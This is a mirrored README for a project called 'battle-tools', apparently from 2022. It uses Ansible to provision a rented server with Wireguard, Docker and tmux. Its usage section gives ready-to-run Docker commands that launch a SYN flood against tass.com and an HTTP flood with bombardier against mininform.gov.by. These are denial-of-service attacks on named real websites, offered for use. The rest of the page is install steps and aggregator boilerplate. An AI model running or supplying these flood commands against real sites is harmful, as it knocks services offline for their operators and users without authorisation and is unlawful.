Git Product home page Git Product logo

battle-tools's Introduction

Important

  • Tested on Ubuntu 20.04
  • For now supported SSH keys only
  • PRs are welcome

Overview

Sometimes we may need good internet channel, especially since Feb 24. There may be no good internet channel or no access to the VPN. Solution to it is to set up a server with tools. All you need is to create virtual server or rent physical server

Details

This is set ansible roles to install core tools on remote server

  • Wireguard VPN, config will be fetched to local
  • Docker
  • tmux

Monitoring tools

Install

Deps

  • pip - python package manager. Install doc can be found here, note, I've not tested it.
  • Wireguard client, install doc can be found here

Install Ansible

If you have pip installed, than install via pip - reference In short, run

python -m pip install --user ansible

Run

Digital ocean

export a_user="root"
export a_ip="SERVER_IP"
ansible-playbook -i "${a_ip}," -u ${a_user} -b play.yaml

Use

Wireguard

Use tools/get shell

Ensure that you have exported variables from Run according to your hosting provider and run following

ssh ${a_user}@${a_ip}

Siege Engine

Tool for SYN flood, ref

docker run --rm -it mack/battle-tools python3 -m siege_engine 300 tass.com

Bombardier

Tool for HTTP stress

docker run --rm -it mack/battle-tools bombardier -c 200 -d 300s -l https://mininform.gov.by

battle-tools's People

Contributors

maksymivash avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.